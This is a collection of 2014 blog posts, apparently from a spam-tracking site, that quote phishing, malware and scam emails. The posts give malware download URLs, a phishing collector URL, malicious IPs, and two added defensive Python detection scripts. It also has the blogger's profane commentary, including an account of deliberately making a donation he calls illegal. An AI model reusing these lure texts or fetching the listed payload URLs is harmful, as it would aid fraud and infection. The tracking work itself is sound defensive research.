We have uploaded fax report on dropbox, please use the following link to download your file:

https://www.dropbox.com/meta_dl/[redacted]

The malicious download is from [donotclick]www.dropbox.com/meta_dl/eyJzdWJfcGF0aCI6ICIiLCAidGVzdF9saW5rIjogZmFsc2UsICJzZXJ2ZXIiOiAiZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbSIsICJpdGVtX2lkIjogbnVsbCwgImlzX2RpciI6IGZhbHNlLCAidGtleSI6ICJvempiZ256bDM2aGRlMTgifQ/AAKxr3bqwwmIfwE_cp_xalkzMz7tKRtiivmPhViZTBLBkA?dl=1 which is an archive file FAX-21651_7241.zip which in turn contains the malicious executable FAX-21651_7241.scr

This binary has a VirusTotal detection rate of 6/53 and the Malwr report shows that it downloads a file from soleilberbere.com/images/2905UKdw.tar which subsequently drops a file eucis.exe with a VirusTotal detection rate of just 3/51. Automated reports [1][2] are pretty inconclusive as to what this does.

Wednesday, 28 May 2014

Despite some high-profile recent cases where SMS spammers have been busted by the ICO, the wave of spam seems to be continuing. This one came less than an hour ago from +447729938098.

Unsure if you qualify for a refund of PPI paid on a loan or credit card? Reply PPI and we will run a no obligation check or reply STOP to opt out. TPPCO

I have no idea who "TPPCO" are, but they are a common sender of these spam messages. In this case, the spam was sent to a number that is TPS registered, and I believe that the approach is fraudulent in any case - in most cases the spammers will get paid for a lead even if it turns out that the claimant wasn't eligible.

If you get one of these, you should forward the spam and the sender's number to your carrier. In the case of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Carriers and the ICO are cracking down on these scumbags, but they need reports from victims to gather enough evidence.

You can also report persistent spam like this via the ICO's page on the subject, which might well end up in the spammers getting a massive fine.

This account is subject to the terms listed in the eFax Customer Agreement.

The telephone number will vary from spam to spam, but the download link seems consistent and is [donotclick]dl.dropboxusercontent.com/s/uk0mlaixvbg52g2/Fax_938_391102933_1245561.zip?dl=1&token_hash=AAEUA5cH_mfvkp4l4CePv7t100XZKo4GBq6ZxY1UiElKyQ&expiry=1401269894 which leads to a ZIP file Fax_938_391102933_1245561.zip which unzips to a malicious executable Fax_938_391102933_1245561.scr.

This binary has a VirusTotal detection rate of 6/53. Automated reporting tools [1][2] show a download from landscaping-myrtle-beach.com/wp-content/uploads/2014/05/2805UKdw.dkt which in turn drops the following files:

Keep track of your account with your latest Online Financial Activity Statement from NatWest Bank. It's available for you to view at this secure site. Just click to select how you would like to view your statement:

View/Download as a PDF

View all EStatements

So check out your statement right away, or at your earliest convenience.

Thank you for managing your account online.

Sincerely,

NatWest Bank

Please do not respond to this e-mail. If you have any questions about this inquiry message or your NatWest Bank account, please speak to a Customer Service representative at +44 121 635 1592

NatWest Bank Customer Service Department

P.O. Box 414 | 38 Strand, WC2N 5JB, London

Copyright 2014 NatWest Company. All rights reserved.

AGNEUOMS0006001

The link in the email goes to [donotclick]dl.dropboxusercontent.com/s/h8ee7pet8g3myfh/NatWest_Financial_Statement.zip?dl=1&token_hash=AAGNPq4-blG8MXToyYPu1l8lXEyrOQNz6EjK7rUBRaSHGg&expiry=1400838977 which downloads an archive file NatWest_Financial_Statement.zip which in turn contains the malicious executable NatWest_Financial_Statement.scr. This has a VirusTotal detection rate of just 3/52.

Automated analysis tools [1][2] show that it downloads a component from [donotclick]accessdi.com/wp-content/uploads/2014/04/2305UKmw.zip

The Malwr analysis shows that it then downloads some additional EXE files:

Identify general principles under the Fair Labor Standards Act. Explain salary requirements and the highly compensated employee exemption. Review what an employer can do to assure classifications are accurate and minimize risks. Discuss the executive, administrative, professional and computer professional duties tests.

More Information

Faculty

Michael A. Pavlick, K&L Gates LLP

The link in the email goes to lormaneducation.net and then forwards immediately to lorman.com, which is a typical technique that spammers use to try to avoid getting blacklisted.

lormaneducation.net is hosted on 64.77.120.67 (Peer 1, US) along with the following domains, which look similarly spammy:

Hello, My beloved brother and sister. I hope my message get to you in peace. My name is Mary Sambo from Borno state in Nigeria. I am crying while putting this message together in the church hostel. I lost my husband to the terrorist attack that is happening in Borno state, my daughters was kidnap along with the 270 girls been kidnap in school chibok village in Nigeria, by the terrorist.

Which the entire world is now searching for them. I am 7 month pregnant and i am staying at the church hostel, we are 30 in a single room, i don't have access to good medical care and i am afraid my living condition might affect my unborn child.

I am asking for help from you in other for me to get a place for myself and also register myself to health center where i will get proper medical care. Please help me with anything you, May Almighty God reward you. Hope to hear from you. Regards.

Mary Sambo. Please reply here: marysamb91@yahoo.com

Apparently this church hostel that she is staying in has internet access good enough to send out spam. And although the scammer is soliciting replies to marysamb91@yahoo.com it is sent from joymcus55@gmail.com which has its own Google+ profile.. which contains a picture.

Now, I don't know about you.. but I don't think that this looks like a Nigerian woman who has to live in a church hostel. That's because it is a photograph of actress and model Yvette Fintland who would no doubt be very displeased to see her photo being abused in this way (and has nothing whatsoever to do with this scam or spam).

There are no words that can adequately describe the horror of the kidnapping of 200 innocent children. And there are no words that adequately describe the disgust at people who are prepared to exploit this awful event for their own personal gain.

Wednesday, 21 May 2014

93.171.173.173 (Alfa Telecom, Russia) is currently distributing the Sweet Orange EK via a bunch of hijacked GoDaddy subdomains. The malware is being spread through code injected into legitimate but hacked websites.

For example [donotclick]www.f1fanatic.co.uk is a compromised website that tries to redirect visitors to two different exploit kits:

The second one is an attempt to load the Fiesta EK although the payload site is currently down. But the .house domain appears to be Sweet Orange (incidentally this is the first time that I've seen one of the new TLDs abused in this way).

The server on 93.171.173.173 hosts a number of subdomains that are hijacked from GoDaddy customers. I recommend that you block either the subdomain or domains themselves:

Prime Aspire is a freelance marketplace. This message, its contents and any attachments are private, confidential and may contain information that is subject to copyright. You may not disclose, use or disseminate all or part of this message without our prior written consent. If you are not the intended recipient, please notify us immediately by replying to this message and then delete it from your system. Whilst we take reasonable precautions to prevent computer viruses, we cannot accept responsibility for viruses transmitted to your computer and it is your responsibility to make all necessary checks. We may monitor email traffic data and the content of emails to ensure efficient operation of our business, for security, for staff training and for other administrative purposes.

This email was sent from Prime Aspire Limited (Registered number: 7850209). Prime Aspire Limited is registered in England and Wales. Registered address: SUITE 34, New House, 67-68 Hatton Garden, London EC1N 8JY United Kingdom. For further information, please click www.primeaspire.com

To unsubscribe please reply with the word "Unsubscribe".

But (and just as a warning, I'm going to get sweary here) wait a fucking minute.. "This message, its contents and any attachments are private, confidential and may contain information that is subject to copyright. You may not disclose, use or disseminate all or part of this message without our prior written consent." You fucking spammed me with this. I will do with it what I fucking well please.

CEO of PrimeAspire is one Chris Adiolé. PrimeAspire (strictly speaking it is Prime Aspire Ltd) is a real company (07850209 in the UK), and Mr Adiolé even has his name on the domain WHOIS details rather than hiding behind a proxy service.

Originating IP is 79.170.44.6 which is Heart Internet in the UK. The primeaspire.com domain is hosted with the same firm on 79.170.40.239.

So, let's assume that this is a real proposition and not some sort of scam. Fair enough. But promoting your startup through spam is always a very bad move, and adding meaningless legalese crap to it is really going to piss people off..

UPDATE: many Kudos points to Chris Adiolé for addressing the issue and apologising. So perhaps they're not such a bad bunch after all :)

Hi,

I note you recently published an article on your blog with regards to a promotional email you received from PrimeAspire.

We are a small startup and after our launch in February we worked with a marketing agency who supplied us with email addresses, claiming to be addresses of people that opted to receive emails about freelancing and related services. Unfortunately, we took their words at face value and failed to check the email addresses before sending out the emails.

On behalf of PrimeAspire, I sincerely apologise for the inconvenience. We are an honest startup working hard on our product and have no intention to send spam emails or use sinister marketing procedures to promote our product.

Thanks,

UPDATE 2: but now PrimeAspire are likely to lose their Kudos point due to this rather rude message from some Indian SEO guy..

I'm Tutu Kumar from india, also a SEO Expert. Now i'm working SEO for Primeaspire.com. And i saw google search pages our blog title PrimeAspire (primeaspire.com) spam. This blog title is bad effect for our website but content is good. Kindly remove the blog of your website.

Thank You, Tutu Kumar

Funnily enough, I don't feel inclined to do that. PrimeAspire sent me a spam.. that happened, and Chris Adiolé apologised which I think shows a great deal of integrity. Perhaps Mr Kumar needs to generate some positive press instead rather than concentrating on my little blog.

Attached is an archive file TT PAYMENT COPY.zip which in turn contains another archive file TT PAYMENT COPY.rar (which relies on the victim having a program to uncompress the RAR file). Once that is done, a malicious executable PaySlip.exe is created. This file has a VirusTotal detection rate of 27/53. Automated analysis tools (such as this one) don't reveal what is happening, but you can guarantee it is nothing good.

Keep track of your account with your latest Online Merchant Financial Activity Statement from NatWest Bank. It's available for you to view at this secure site. Just click to select how you would like to view your statement:

View/Download as a PDF

View all EStatements

So check out your statement right away, or at your earliest convenience.

Thank you for managing your account online.

Sincerely,

NatWest Bank

Please do not respond to this e-mail. If you have any questions about this inquiry message or your NatWest Bank ® Merchant account, please speak to a Customer Service representative at 1-800-374-2639

NatWest Bank Customer Service Department

P.O. Box 414 | 38 Strand, WC2N 5JB, London

Copyright 2014 NatWest Company. All rights reserved.

AGNEUOMS0006001

The link in the email goes to [donotclick]bit.ly/1jKW2GJ which then downloads a malicious file Statement-pdf.scr which has a VirusTotal detection rate of 8/53. Automated analysis tools [1][2][3][4] are inconclusive about what the malware actually does.

One thing about bit.ly links is that if you put a "+" at the end of the link you can see how many people clicked it. In this case, 236 people have clicked so far, mostly in North America. I suspect that quite a few of those are malware researchers!

We are currently seeking to employ individuals world wide. How would you like to make money by simply driving your car advertising for RED BULL.

How it works?

Here's the basic premise of the "paid to drive" concept: RED BULL seeks people -- regular citizens, professional drivers to go about their normal routine as they usually do, only with a big advert for "RED BULL" plastered on your car. The ads are typically vinyl decals, also known as "auto wraps," that almost seem to be painted on the vehicle, and which will cover any portion of your car's exterior surface.

What does the company get out of this type of ad strategy? Lots of exposure and awareness. The auto wraps tend to be colorful, eye-catching and attract lots of attention. Plus, it's a form of advertising with a captive audience, meaning people who are stuck in traffic can't avoid seeing the wrapped car alongside them. This program will last for 3 months and the minimum you can participate is 1 month.

You will be compensated with $300 per week which is essentially a "rental" payment for letting our company use the space no fee is required from you RED BULL shall provide experts that would handle the advert placing on your car. You will receive an up front payment of $300 inform of check via courier service for accepting to carry this advert on your car.

It is very easy and simple no application fees required contact email along with the following you are interested in these offer. rolandbest195@gmail.com

It's a scam.. but what is the scam exactly? The whole process is nicely detailed here, but essentially the scammers send you a fake cheque ("check" in the US) as payment. This cheque includes an amount that you are meant to pay the "graphic artist" for the work needed to create the wrap. Of course, once you have sent your own money to the "artist" (in reality a scam artist) then the fake cheque will be rejected, and you will end up out of pocket (and possibly in trouble with the police or bank for fraud).

The overpayment scam is a common one, and it is used in all sorts of different set-ups. If anyone sends you a cheque and then asks you to pay it in and forward some of the money elsewhere then you can almost guarantee that someone is trying to rip you off.

All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record. Not yet filing your accounts online? See how easy it is... For enquiries, please telephone the Service Desk on +1 800-285-4794 or email enquiries@citibank.com. This email was sent from a notification-only email address which cannot accept incoming mail. Please do not reply directly to this message.

Attached to the message is an archive file CommercialForm.zip which in turn contains a malicious executable CommercialForm.exe which has a VirusTotal detection rate of 19/52. Automated analysis tools [1][2][3] show that it downloads an encrypted file from [donotclick]desktopcrafts.com/wp-content/uploads/2014/05/Targ-1405USdp.enc although what that does is currently unclear.

Network Operations Center doesn't exactly have a glowing reputation for cleanliness when it comes to malware. The following IPs and hosts seem to be distributing something nasty which appears to be injected into victim sites.

I don't have a good analysis of what is going on at the moment, so you'll just have to take my word for it. The activity has been observed on the following Network Operations Center IP addresses over the past few days:

A lot of these IPs are connected with things like porn sites, but they also have a number of malicious subdomains in the form .one, .two and .three on them. You can safely assume that the domains themselves are malicious (listed at the end of the post if you want to block them). Malicious subdomains spotted are:

Now, I use a unique email address for every service I use, and today I was surprised to see the address I used for Overture being used in this spam. I believe this is the first time that I have ever seen spam to this address, so I assume that this is a recent leak of addresses (and Yahoo! has had all sorts of problems with breaches and the Heartbleed bug recently).

The botnet sending out this spam does seem to have access to leaked email data that I haven't seen used before. So is this an early warning of yet another problem at Yahoo?

This is my first run for political office. I am a doctor, not a career politician, but I just couldn’t sit on the sidelines and watch what is happening to our great nation any longer.

I have always stood up for what I believe in. The first time I stood up to a bully I was 7 years old.

Today, the biggest bully I see is the federal government. I grew up on a working farm in Plankinton, South Dakota. I am a doctor who works with the elderly and the poor. The clinic I own is a small business. In every area of work and life, there is just too much government interference.

Being a doctor, I understand how unfair and harmful Obamacare really is -- and I have vowed to repeal every single word of it. I also pledge to cut taxes, defend the second amendment, and to protect the unborn.

Washington, D.C. insiders don’t want to see people like you and me change their way of doing business.

Change is possible, but it takes effort from all of us.

I am fighting for that change against an establishment insider with millions of dollars, much of it PAC money from special interest groups.

My opponent has so much PAC money, he can afford to be wasteful – and he is. Just this week, he produced a slick advertisement for TV that didn’t even feature voters from the state of South Dakota. And when he was caught, he didn’t even apologize -- he just threw the advertisement away.

That’s not how I do things.

I am a fiscal conservative. I promise that if you donate now, your hard earned donation will be used in a responsible way to fight big government and wasteful spending. I need your help to get there. Will you join me?

Absentee ballots in South Dakota are mailed out this month and that’s when voting begins – will you chip in $5 or more today?

It seems that she's a Doctor of some sort, but she opposes affordable healthcare. As Europeans we are constantly amazed and horrified at the way US healthcare professionals just let people die when the money runs out of their insurance policy.. if they have an insurance policy. Until Obama forced changes to the US healthcare system through it was 100 years behind that in Europe. Now it is only 80 years or so behind. Progress I guess.

Also, Annette Bosworth (or whatever idiot is spamming on her behalf) is attempting to solicit funds through fundly.com which violates their terms of service. Luckily she hasn't been able to recruit many other morons to her cause and has only raised $1,150 out of a target of $750,000.

Well, since this is an abuse of the Fundly terms of service, then getting it shut down and losing the funds could be a bit of a laugh.

The spam originates from two18.2bits.co (63.143.38.243) and spamvertises a site at marketer.2bits.co (63.143.38.226). Both these IPs are allocated to Limestone Networks in the US, but are suballocated to a customer called Joseph (Joey) Burzynski of ResistedNormalcy LLC and/or MarketKar.ma in Dallas. The email is digitally signed for the domain bosworthcampaign.com which has hidden WHOIS details.

Of course, this could be a subtle Joe Job intended to frame Annette Bosworth and make her look like a moron. But according to Joey Burzynski's own Facebook page at www.facebook.com/resistednormalcy/likes he "likes" Annette Bosworth. And tattoos. A lot.

There are plenty of other indicators online that Dr Bosworth has employed the promotional "talents" of Mr Burzynski.

I'm not the only one that thinks that this is spammy either, because Gmail says..

Presumably Annette Bosworth thinks that her point of view is so important that she can spam it out to people at random, regardless of where they live. I personally think she is a moron spammer and hope that the electors of South Dakota treat her accordingly.

Contributions and donations may not be solicited, accepted, or received from, or made directly or indirectly by, foreign nationals who do not have permanent residence in the United States (i.e., those without green cards). This prohibition encompasses all US elections; including federal, state and local elections. 11 CFR 110.20(b).

So it would be prohibited for Dr Bosworth's campaign to accept a donation from me as I live in the UK and have never even visited the US.

UPDATE 13 May 2014: it has been said that Americans don't get irony. When I made my illegal $10 contribution to Annette Bosworth's campaign, I added the comment "Ten Bucks Well Spent!" because I knew that that accepting the money from a foreign donor would have some entertaining repercussions.

What I didn't expect was that not only would the donation be accepted, but that Dr Bosworth would also quote me on her Facebook page..

I like the comment "GOOD AMERICAN;;" (even with the spurious semicolons. Perhaps Americans don't understand semicolons either. I'm not sure I do) because of course I am British. And if Dr Bosworth's supporters knew my political leanings then they would assume I was the Spawn of Satan.

Interestingly, this means that they not only accepted the donation but someone took the time to review it.. surely then they should have spotted that I was not in the US.

Thank you for sending your VAT Return online. The submission for reference 0781569 was successfully received on Fri, 9 May 2014 12:47:49 +0530 and is being processed. Make VAT Returns is just one of the many online services we offer that can save you time and paperwork.

For the latest information on your VAT Return please open attached report.

The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Cable&Wireless Worldwide in partnership with MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

It says "On leaving the GSi this email was certified virus free" which (as you might suspect) is utter bollocks, because it comes with a malicious payload. Attached to the message is an archive VAT0781569.zip which in turn contains two identical malicious executables AccountDocuments.scr and VAT090514.scr which have a VirusTotal detection rate of 15/52.

This is part one of the infection chain. Automated analysis [1][2][3] shows that components are then downloaded from the following locations:

The malicious binary heap170id3.exe has a VirusTotal detection rate of 9/52. Automated analysis [1][2] shows that this makes a connection to a server at 94.23.32.170 (OVH, France).

The other malicious binary, b01.exe had a VirusTotal detection rate of 11/52. Analysis of this shows [1][2] that it attempts to connect to several different email services, presumably to send out spam.

we want to inform you that your supplier/seller shipped your goods through our shipping services, we hope your supplier must have given you the details about your container vessel, we strongly recommend that you confirm your goods/cargo immediately by tracking your goods online. All shipped container/goods must be tracked to enable you to know the location of your shipment and to know the arrival date of vessel. This is why MAERSK LINE has enabled a user friendly interface for our customers to track there goods by themselves without the help of the agents.

Download the container tracking form attached and log in with your email now to know the status and location of your container/shipment. You must use the email which you used in communicating with your supplier/seller that is the email our tracking system will recognize because it is the email your supplier registered your goods with. You will be able to save the search criteria for easy reuse at a later stage. You will also have the opportunity to search for shipment from/from specific locations and many other features.

This attempts to harvest credentials and then POSTs them to a dedicated phishing site at send.apbem.org.br/zolamaersksend.php (189.73.155.37 / Brasil Telecom, Brazil). Once the username and password have been stolen, the victim is sent to the real My Maersk site (which doesn't actually require a password for basic container tracking).

Not many people will have a relevant shipping account at Maersk, but you can imagine the potential value of being able to ship stolen or illegal goods for free..
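As an added example (this is not code from the original post), here is a small Python check for the pattern described above: an HTML "tracking form" attachment whose login form asks for a password and submits it to a host other than the brand it impersonates. The sample HTML below is constructed for the example; its form action reuses the collector URL quoted in the post, and the allowed-domain set (maersk.com) is an assumption about where a genuine Maersk login would post.

```python
"""Flag HTML attachments whose login form posts credentials off-brand."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormExtractor(HTMLParser):
    """Collect every <form> with its action, method and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "action": attrs.get("action") or "",
                "method": (attrs.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                {"type": (attrs.get("type") or "text").lower(),
                 "name": attrs.get("name") or ""}
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _in_domains(host, allowed):
    """True if host is one of the allowed domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in allowed)


def find_offsite_credential_forms(html, allowed_domains):
    """Return forms that ask for a password and submit it outside allowed_domains.

    A form with a relative action (no host) is reported too: an HTML file opened
    from an e-mail attachment has no legitimate local place to post to.
    """
    parser = FormExtractor()
    parser.feed(html)
    hits = []
    for form in parser.forms:
        if not any(i["type"] == "password" for i in form["inputs"]):
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        if not _in_domains(host, allowed_domains):
            hits.append({"host": host, "method": form["method"],
                         "fields": [i["name"] for i in form["inputs"]]})
    return hits


# Constructed sample modelled on the "container tracking form" lure; the
# action is the collector URL quoted in the post above (assumed form layout).
SAMPLE_PHISH = """
<html><body><h2>Maersk Line - Track your shipment</h2>
<form method="POST" action="http://send.apbem.org.br/zolamaersksend.php">
  Email: <input type="text" name="email">
  Password: <input type="password" name="passwd">
  <input type="submit" value="Track">
</form></body></html>
"""

# Same fields, but posted to the brand's own domain: should not be flagged.
SAMPLE_LEGIT = SAMPLE_PHISH.replace(
    "http://send.apbem.org.br/zolamaersksend.php", "https://my.maersk.com/login")


if __name__ == "__main__":
    for label, doc in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(label, find_offsite_credential_forms(doc, {"maersk.com"}))
```

The check deliberately keys on the password field rather than on the word "login": lures like this one copy the real brand's page text, but the one thing they cannot copy is a form action on the brand's own domain.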

In order to have your company inserted in the global trade register of partner companies for the 2015/2016 edition you must print, complete and send the enclosed form before the end of next week to the following address:

World Trade Register, P.O. Box 3079, 3502 GB Utrecht, The Netherlands

or fax it to: +31 205 248 107

or reply to this email and attach the form to it.

Updating is free of charge! To unsubscribe please visit this link: unitedtraderegister.eu/unsubscribe.php?email=info@[redacted] In case the form is missing you can download it here: unitedtraderegister.eu/wtr.pdf

The company behind this spam is a ROKSO-listed organisation called World Company Register / EU Business Register. A ROKSO listing basically means that this is one of the worst spammers currently in the world.

unitedtraderegister.eu forwards to europeantraderegister.net (and worldtraderegister.net is on the same server). This is an old-fashioned directory scam and it should be ignored.

Please review attached BACs documents and fax it to +44 (0) 845 600 3319. Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager.

Yours faithfully

Annmarie Baldwin, Senior Manager, Lloyds Commercial Banking

Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.

Please remember we guarantee the security of messages sent by email.

The last line gave me a laugh.. "Please remember we guarantee the security of messages sent by email." Attached to the message is a file LloydsCase-0995479.zip which in turn contains a malicious executable LloydsCase-07052014.scr. The binary is identical in function to the one used in this TNT spam run doing the rounds at the same time.

The attachment is GB5766211.zip which contains the malicious executable GB07052014.scr (note the date is encoded into the filename). This has a VirusTotal detection rate of 7/52.

Automated analysis tools [1][2][3] show a UDP connection to wavetmc.com and a further binary download from demo.providenthousing.com/wp-content/uploads/2014/05/b01.exe

This second executable has a VirusTotal detection rate of 20/51. The Malwr report and Anubis report both show attempted connection to various mail servers (e.g. Gmail and Hotmail). Furthermore the Anubis report shows a data transfer to 83.172.8.59 (Tomsk Telecommunication Company, Russia).

I guess the psychology here is that if you can't tell a convincing lie, then tell a short one. The attachment is emailinvoice.069911.zip which in turn contains a malicious executable emailinvoice.899191.exe which has a VirusTotal detection rate of 5/52.

Automated analysis of this binary [1][2][3] shows that it downloads a further component from one of the following locations:

This "111.exe" binary has an even lower VirusTotal detection rate of 3/51. Automated analysis [1][2][3] shows that the malware installs itself deeply into the target system.

There is a further download of a malicious binary from files.karamellasa.gr/tvcs_russia/2.exe which has a detection rate of 5/50 and identifies as a variant of Zeus. This creates fake svchost.exe and csrss.exe executables on the target system [1][2][3].

If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt.com/personal/digitalvault/help or call the helpdesk on 0870 240 1116* between 8am and midnight.

Thank you for choosing BT Digital Vault.

Kind regards,
BT Digital Vault Team

*Calls charged up to 8 pence per minute on the BT network (minimum fee 5.5p). Mobile and other network costs may vary. See http://www.bt.com/pricing for details.

Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address.

This electronic message contains information from British Telecommunications plc, which may be privileged or confidential. The information is intended for use only by the individual(s) or entity named above. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of the contents of this information is strictly prohibited. If you have received this electronic message in error, please delete this email immediately.

You will be asked to log into your account to confirm this email address. Be sure to log in with your current primary email address.

We ask you to confirm your email address before sending invitations or requesting contacts at Linkedln. You can have several email addresses, but one will need to be confirmed at all times to use the system.

If you have more than one email address, you can choose one to be your primary email address. This is the address you will log in with, and the address to which we will deliver all email messages regarding invitations and requests, and other system mail.

One example landing URL is [donotclick]www.ccccooa.org/buyphentermine/ which leads to a sort of intermediary landing page..

This in turn goes to a redirect at [donotclick]stylespanel.com/h/go/phentermine.php and then to [donotclick]www.hq-pharmacy-online.com/search.html?q=phentermine which is a fake pharmacy site hosted on 95.211.228.240 (LeaseWeb, Netherlands) and registered to a probably fake address in Argentina.

Avoid.. oh, and if you run a WordPress site please make sure the software is up-to-date.

Someone close to you wants you to spend at least the next five years of your life behind bars. He has reported you to our organization and I am the one assigned to follow you up to gather more evidences against you. Attached to this email is a copy of the person's audio recording against you. Your name was mentioned eleven times in this recorded conversation, check if you can recognise the person's voice.

What I require is that you create a new email address which will be used for our further correspondence. Use your mobile phone number to text me your newly created email address on this number: +66928711125. The phone line is secured and cannot be traced by our organization or any other law enforcement agent. I know my reason for disclosing this important information to you at this time. Upon receiving your text, I will tell you who I am, our organization and what next you are to do.

You are to note the following and observe them, contrary to these, you will never hear from me again.

1. You are not to reply me on this email address.
2. You are not to call me on the above given number for any reason.
3. You are to text only your newly created email address to me.
4. The newly created email address must be used just for the both of us alone
4. If you know the voice in the recorded message, never approach the person until I tell you to.
5. You must not disclose anything relating to this information to another person.

Having read and understood what I have said, you are to now create a new email address and send it to me by text through your mobile phone number. I am waiting.

Yours sincerely, Agent Feather.

Attached is a file His Voice.zip which unzips to another file called Voice Conversation without any extension at all. In fact, this file is a malicious executable (you would have to rename it to Voice Conversation.exe manually if you want to infect yourself) which has a VirusTotal detection rate of 13/49.

Most of the automated tools I have thrown at it seem to error out, but the ThreatExpert report does show the malware installing itself onto the test system and making some system changes to prevent removal. It also enumerates the IP address, detects proxy settings and attempts to connect to Google's Gmail SMTP server.

The block is owned by RN Data SIA of Latvia and suballocated to somebody in St Petersburg by the name of Mikhail Evgenyevich Valyalov. RN Data are one of those hosts that have hosted malware in the past, and I tend to lean towards blocking them.

A look at the other contents of the /24 appears [csv] to indicate further suspicious activity, especially f528764d624db129b32c21fbca0cb8d6.com on 146.185.213.53 (mentioned here plus several other places).

So, frankly this entire /24 looks like it is being used for evil purposes at the moment and I recommend that you block it, plus these following domains:

Dear Customer, Our company has obtained your order and it'll be processing for 2 days. The bill of parcels and delivery details are below: http://www.anat-barnir.co.il/04-05-2014/clients/clients.045-264.zip Sincerely yours, BiP Solutions Company, Eduard Fulton

BiP Solutions is a real company, but this spam did not come from them. The link in the email goes to a legitimate (but hacked) site in Israel and downloads a file clients.045-264.zip which unzips to a malicious executable clients.045-264.PDF______________________________________________________.exe (there are a lot of underscores in there, yes). This has a VirusTotal detection rate of 15/52, however automated analysis tools [1][2] are inconclusive as to what it actually does.
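As an added example covering this post and the "His Voice.zip" one above (example code written for this page, not the blog's own), here is a Python triage script that walks a ZIP attachment and flags members that are Windows executables regardless of what the filename suggests: by the MZ/PE header bytes (so an extensionless "Voice Conversation" is caught without renaming it), by executable extension (.scr is just an .exe by another name), and by the padded double-extension trick where a run of underscores pushes the real .exe out of view. The ZIP and the stub PE files inside it are constructed inline so the script runs offline; the member names reuse the filenames reported in the posts above, and the padding length is an assumption.

```python
"""Triage a ZIP attachment for disguised Windows executables."""
import io
import re
import struct
import zipfile

# Extensions Windows will execute on double-click; .scr (screensaver) is a plain PE.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}

# "name.PDF_______________.exe": a benign-looking extension, a long run of
# padding so the real one scrolls out of view, then the executable extension.
PADDED_EXT = re.compile(r"\.(pdf|doc|docx|xls|xlsx|jpg|txt)[ _\-]{5,}\.[a-z]{2,4}$", re.I)


def is_pe(blob):
    """True if blob starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_zip(data):
    """Return [{'name': member, 'reasons': [...]}, ...] for every suspicious member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            basename = info.filename.rsplit("/", 1)[-1]
            ext = basename.rsplit(".", 1)[-1].lower() if "." in basename else ""
            with zf.open(info) as fh:
                head = fh.read(4096)  # the headers are all we need
            reasons = []
            if is_pe(head):
                reasons.append("PE header")
                if not ext:
                    reasons.append("no extension")  # the 'Voice Conversation' trick
            if ext in EXEC_EXTS:
                reasons.append("executable extension ." + ext)
            if PADDED_EXT.search(basename):
                reasons.append("padded double extension")
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def _fake_pe():
    """Minimal stub with a valid MZ/PE header; it is not a runnable program."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)


# Constructed name in the style of the BiP Solutions sample (padding length assumed).
PADDED_NAME = "clients.045-264.PDF" + "_" * 54 + ".exe"


def build_sample_zip():
    """Constructed ZIP reproducing the naming tricks from the posts above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Voice Conversation", _fake_pe())  # no extension at all
        zf.writestr(PADDED_NAME, _fake_pe())           # .PDF____.exe
        zf.writestr("FAX-21651_7241.scr", _fake_pe())  # .scr is an .exe
        zf.writestr("readme.txt", b"plain text, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_zip(build_sample_zip()):
        print(hit["name"], "->", ", ".join(hit["reasons"]))
```

Checking the header bytes rather than the name is the important part: the extension-based rules catch the common cases cheaply, but only the MZ/PE check catches a member that has had its extension stripped or swapped, and it costs one 4 KB read per member.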